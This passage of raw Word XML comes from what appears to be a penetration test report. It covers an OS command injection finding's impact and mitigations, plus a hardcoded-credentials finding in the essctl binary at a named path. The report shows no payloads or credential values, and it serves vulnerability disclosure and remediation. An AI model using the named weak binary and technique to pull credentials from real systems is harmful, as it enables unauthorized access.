              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747803AD" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Successful exploitation of OS command injection vulnerabilities can result in arbitrary command execution with the privileges of the vulnerable application or user. This can lead to unauthorized access to sensitive data, remote shell access, privilege escalation, and potential full system compromise. In containerized environments, such exploitation may also lead to breakout attempts or further compromise of the host infrastructure, depending on configuration and privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D4522" w14:paraId="006D9B91" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05657FFE" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EBEB2C" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>If possible, CLI/APIs should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks that cannot be manipulated to execute unintended commands.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A9BDCA" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74E2E12C" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">If incorporating user-supplied data into operating system commands is unavoidable, the following two layers of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> should be implemented to prevent attacks:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE53950" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>User data should be rigorously validated. Ideally, a whitelist of specific accepted values should be used.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD4944A" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Alternatively, only short alphanumeric strings should be accepted.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4849E01B" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Input containing any other data, including conceivable shell metacharacters or whitespace, should be rejected.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55274426" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Ensure all API inputs are strictly validated using allowlists. Reject or escape any special characters that could be used to inject OS commands.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6E4590" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Refrain from using unsafe functions (e.g., system(), exec()) with user input. If necessary, use safe execution methods like parameterized subprocess calls.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476F8465" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C3703CA" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Run containers and applications with the minimum privileges required. Avoid running containers as root and drop unnecessary Linux capabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059921D8" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Do not store SSH private keys or sensitive credentials inside containers. Use appropriate permissions and mount secrets securely using a secrets manager.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB41D8E" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Use minimal, hardened container images. Disable interactive shells inside containers and isolate them from the host system using tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AppArmor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>SELinux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EDEB25E" w14:textId="77777777" w:rsidR="008D4522" w:rsidRDefault="008D4522" w:rsidP="00A024F9">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement logging and alerting for suspicious API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A024F9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>, such as command-like input patterns or abnormal output responses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79F6F08C" w14:textId="3103DB5F" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId69" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195172">
        <w:bookmarkStart w:id="47" w:name="_Toc200562851"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195172: Hardcoded Credentials</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FDC20A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Medium)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9410"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="35E4CFCE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1177126A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="200A212F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Hardcoded credentials refer to sensitive authentication details such as usernames, passwords, API keys, or tokens that are embedded directly within application code or binaries. This practice poses a significant security risk, as attackers can extract these credentials through static analysis techniques, enabling unauthorized access to systems or data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA7D626" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40D5BEC4" w14:textId="15E02C12" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="007E71FC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">During the course of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>pentest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, static inspection using the strings utility revealed embedded plaintext credentials on </w:t>
            </w:r>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00481C04">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> binary. This indicates the application stores authentication details directly within the compiled executable, making them accessible to any user with read access to the file and exposing the application to potential credential theft and misuse.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63044556" w14:textId="609D8A3C" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D967360" wp14:editId="67CCFE4A">
                  <wp:extent cx="5930840" cy="2655736"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19" name="Drawing 19" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 19" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId70"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5935013" cy="2657605"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488985D6" wp14:editId="79D7A338">
                  <wp:extent cx="5928447" cy="500932"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20" name="Drawing 20" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 20" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId71"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6049817" cy="511187"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="47CFDEAC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2604EA54" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259E5FD9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="32627BDA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9E5A55" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Vector</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31FC2D4C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2999CBDE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0736195D" w14:textId="4CF9BCCD" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="008C3C97">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4177BCFB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="51A9B2A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2EBF98" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7878E9AE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Hardcoded credentials can be easily extracted by attackers with local access, leading to unauthorized access to internal systems or services. This can result in data breaches, privilege escalation, or lateral movement within the network. If reused elsewhere, compromised credentials could expose other critical environments as well.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="5C8759FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76373649" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2A8043" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Remove hardcoded credentials and use environment variables, secure configuration files with proper permissions, or a secrets management solution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F941BF8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId72" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195165">
        <w:bookmarkStart w:id="48" w:name="_Toc200562852"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195165: Unsigned Executable File</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
